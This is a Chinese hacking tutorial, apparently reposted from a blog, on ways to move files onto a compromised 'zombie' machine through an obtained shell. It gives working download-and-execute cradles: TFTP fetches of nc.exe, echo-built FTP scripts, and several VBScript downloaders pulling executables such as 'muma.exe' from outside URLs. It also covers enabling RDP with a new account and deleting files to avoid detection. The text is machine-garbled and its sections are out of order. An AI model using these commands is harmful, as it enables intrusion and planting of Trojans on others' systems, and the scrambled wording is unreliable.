上传文件到肉鸡的路不止一条

  • 时间:
  • 浏览:4
  • 来源:万人牛牛_万人牛牛官网

本文转自gaodi1002 51CTO博客,原文链接:http://blog.51cto.com/gaodi1002/1618188

再切换到亲戚亲戚朋友儿得到的SHELL窗口里,点击右键挑选“粘贴”命令把亲戚亲戚朋友儿刚才克隆技术的字符都粘贴进去,让我看完代码飞速变换,像黑客帝国里的镜头,很过瘾模∪缦峦? 

三、EXE2BAT的超级应用  

代 码克隆技术完成后,输入:ren tvisGRAY 3389.exe命令就还才能把3389.exe还原,现在你的你这一 文件就传上去了。你这一 措施的优点是之统统,不可能 它还才能直接利用不可能 得到的shell将 文件以“代码”的形式输入到对方电脑,不都要任何网络工具的支持,同样也不我我必打开任何的端口,也没法任何应用应用应用程序,能穿越任何防火墙。不过你这一 措施全是曾经明 显的缺点,也不我我上传的应用应用程序体积只能太多,不然代码的上传时间太多不说,再还原成源应用应用程序的前一天也不我我可能 突然出现什么的问题。



           四、FTP法传输  

           有的前一天亲戚亲戚朋友儿另一方的计算机没法公网IP地址,你这一 前一天想用TFTO就比较麻烦了,不可能 你嫌顶端的措施比较麻烦得话,那你还还才能用你这一 比较简单的措施也不我我用 FTP,也不我我亲戚亲戚朋友儿在得到的SHELL里只能直接登陆亲戚亲戚朋友儿的FTP服务器去下载东西,这涉及到许多FTP协议的什么的问题,在这里就不详述了,亲戚亲戚朋友儿也不我我讨论为什么么么传 文件嘛!当亲戚亲戚朋友儿只能直接传的前一天亲戚亲戚朋友儿还才能换个措施来实现,你这一 措施也不我我写个ftp.txt的文件来向FTP服务器提交就还才能了。在亲戚亲戚朋友儿得到的肉鸡的 SHELL里写入以下代码:  

           echo ftp >ftp.txt  

           echo open服务器ip [端口]>>ftp.txt  

           echo username>>ftp.txt  

           echo password>>ftp.txt  

           echo get sample.exe>>ftp.txt  

           echo bye>>ftp.txt  

           其中服务器ip就没法你放你想传的文件的FTP的服务器 IP地址;username就没法你登陆你的FTP的帐号;password就没法你的密码;sample.exe就没法你想下载的应用应用程序名字。最后曾经bye是 退出FTP服务器。如下图是我做的曾经示范:  

           

           其中218.XXX.XX.163 也不我我我的FTP服务器的IP地址,iceskysl也不我我我的用户名,653917也不我我我的密码;mt.exe也不我我我想下载的文件。亲戚亲戚朋友儿DIR下看看写成功你这一 ftp.txt么?看上图显示亲戚亲戚朋友儿写好了!  

           为了确保亲戚亲戚朋友儿没法写错,最好还是用TYPE命令来看看你这一 FTP.TXT文件的内容是全是亲戚亲戚朋友儿想写进去的,一般来说是不想错的!如下图显示;接着执行ftp -s:ftp.txt 就还才能下载到们的那个文件了,我这里下载的也不我我MT.exe你这一 文件,如下图显示的也不我我我成功下载的提示了。  

           

           

           记得最时会用del ftp.txt来删掉亲戚亲戚朋友儿写的你这一 TXT文件,要不被发现了亲戚亲戚朋友儿就亏大了!现在你这一 文件就传上去了,接着为什么么么做就何必 我教你了吧!  

           

           五、利用xiazai.vbe法  

           你这一 措施也是很简单有效的,亲戚亲戚朋友儿在得到的肉鸡SHELL里依次写入下面那先 命令来创建曾经VBE文件,代码如下:  

           echo with wscript:if .arguments.count^<2 then .quit:end if >xiazai.vbe  

           echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>xiazai.vbe  

           echo web.open "get",.arguments(0),0:web.send:if web.status^>100 then quit >>xiazai.vbe  

           echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>xiazai.vbe  

           曾经就会在肉鸡中生成曾经xiazai.vbe的文件,如下图是我演示的曾经结果显示,亲戚亲戚朋友儿通过DIR还才能看完你这一 xiazai.vbe文件不可能 成功创建了。  

           

           

           现在亲戚亲戚朋友儿但会 输入cscript xianzai.vbe http://iceskysl.e2u.cc/server.exe   mtt.exe就还才能把http://iceskysl.e2u.cc/server.exe你这一 地址下的你这一 server.exe下载到肉鸡中也不我我改名字为mtt.exe,目的达到,接着为什么么么做,让我太多说了!  

           

           六、利用iget.vbe法  

           你这一 措施同顶端的那个差太多,也不我我写法不一样,具体的还是在肉鸡SHELL中写入下面的代码:  

           echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe  

           echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe  

           echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe  

           echo xPost.Open "GET",iRemote,0 >>iget.vbe  

           echo xPost.Send() >>iget.vbe  

           echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe  

           echo sGet.Mode = 3 >>iget.vbe  

           echo sGet.Type = 1 >>iget.vbe  

           echo sGet.Open() >>iget.vbe  

           echo sGet.Write(xPost.responseBody) >>iget.vbe  

           echo sGet.SaveToFile iLocal,2 >>iget.vbe  

           曾经写好后就还才能曾经执行了cscript iget.vbe http://icesky.com/muma.exe mm.exe 就还才能把http://icesky.com/muma.exe你这一 地址的应用应用程序muma.exe下载下来也不我我改名字为mm.exe。和前面的执行差太多就不抓图了!  

           

           七、利用Http网站vbe法  

           你这一 也不我我亲戚亲戚朋友儿前面讲的那个Recton应用应用程序种植者所用的HTTP法下载的原理,亲戚亲戚朋友儿在得到的肉鸡的SHELL里依次写入下面那先 :  

           echo Set xPost = CreateObject("Microsoft.XMLHTTP") >dsa.vbe  

           echo xPost.Open "GET","http://***.*/sample.exe",0 >>dsa.vbe  

           echo xPost.Send() >>dsa.vbe  

           echo Set sGet = CreateObject("ADODB.Stream") >>dsa.vbe  

           echo sGet.Mode = 3 >>dsa.vbe  

           echo sGet.Type = 1 >>dsa.vbe  

           echo sGet.Open() >>dsa.vbe  

           echo sGet.Write(xPost.responseBody) >>dsa.vbe  

           echo sGet.SaveToFile "sample.exe",2 >>dsa.vbe  

           写好后执行:cscript dsa.vbe 就还才能把你顶端的那个地址("http://***.*/sample.exe,注意要添加你另一方放应用应用程序的地址)下的文件下载下来了,最后同样别忘记了用del dsa.vbe删掉亲戚亲戚朋友儿刚才写的那个文件哦!  

           

           八、 3389法  

           不可能 你得到的主机是还才能开3389的,那就更加好办了,亲戚亲戚朋友儿有统统的措施开3389,(你这一 到底为什么么么开就找不到你这一 专题之内了,让我查阅相关资料不可能 写次 再写你这一 专题的内容)你就还才能开了他的3389,再另一方加个帐号,也不我我登陆,在它的3389桌面环境下进行“本地”下载,该措施还有个好处也不我我对服务器上 传很严格的机器特有效。(包括硬件防火墙)

从 图中亲戚亲戚朋友儿还才能看完,exe2bat还才能将曾经应用应用应用程序(.exe)转换为曾经批处置文件(.bat),而批处置文件亲戚亲戚朋友儿是还才能编辑的,下面亲戚亲戚朋友儿就将曾经开 3389的小工具3389.exe转换为批处置文件。输入:exe2bat.exe 3389.exe 3389.bat,回车后就还才能得到曾经名为3389.bat批处置文件。  

二、 Recton应用应用程序种植者直接种植  

2、Http法上传  

OK,亲戚亲戚朋友儿不可能 把NC传到亲戚亲戚朋友儿的目标机上了。看下有没法呢?用DIR命令看下当前目录下有个文件叫NC也不我我明文件确实 传上去了。如下图:  

好了,亲戚亲戚朋友儿用记事本打开生成的批处置文件,也不我我点击“编辑”菜单中的“全选”和“克隆技术”命令,将文件中的源代码除了最后2行(如图)外删剪克隆技术到剪贴板中。  

一、 TFTP法传输  

我 们最喜欢也是最方便的措施是用TFTP!这里要配合TFTP32你这一 小型的文件传输服务器,TFTP协议使用的是UDP69端口,在亲戚亲戚朋友儿得到肉机的 SHELL后还才能很方便的传输文件到肉机上的!下面看我删剪的讲解和操作,在亲戚亲戚朋友儿得到的SHELL里输入tftp –I IP get/put xx.exe就OK了,注意这里一定要记得带上参数-I,不然是不想成功的,还有要注意的是PUT是把肉鸡上的文件传到亲戚亲戚朋友儿另一方的机子上,一般常用来偷秘 密文件(为什么么么像做贼似的);GET是从亲戚亲戚朋友儿的机子上取文件到肉鸡上,也也不我我上传文件到肉鸡上,亲戚亲戚朋友儿这里要用的是GET你这一 动作,不可能 我的IP是 218.XXX.XXX.7,统统让我在得到的SHELL里输入tftp –I 218.XXX.XXX.7 get nc.exe也不我我到亲戚亲戚朋友儿的机子上取NC你这一 亲戚亲戚朋友儿要上传的文件,还才能是任何你想传的东西,也不我我最好传的文件比较小,也不我我容易失败.  

别急着敲回 车,亲戚亲戚朋友儿都要在亲戚亲戚朋友儿另一方的机子上架好TFTP32你这一 软件才行,这里有个技巧,亲戚亲戚朋友儿还才能把TFTP32你这一 软件和亲戚亲戚朋友儿的NC上放去曾经目录下,曾经在取文件 时就不想另外写路径了,很是方便,亲戚亲戚朋友儿把TFTP32上放去NC曾经目录里打开后它就在69端口监听看有没法都要传送文件的请求,这时亲戚亲戚朋友儿就在得到的 SHELL里写好的那句话后敲回车就好了,为什么么么知道传问了没呢?亲戚亲戚朋友儿还才能看完在SHELL里有显示的,看下图4-12:  

看完顶端的提示也不我我明传完了 ,亲戚亲戚朋友儿也还才能看看本机上的TFTP32的窗口,如下图示也说明传完了!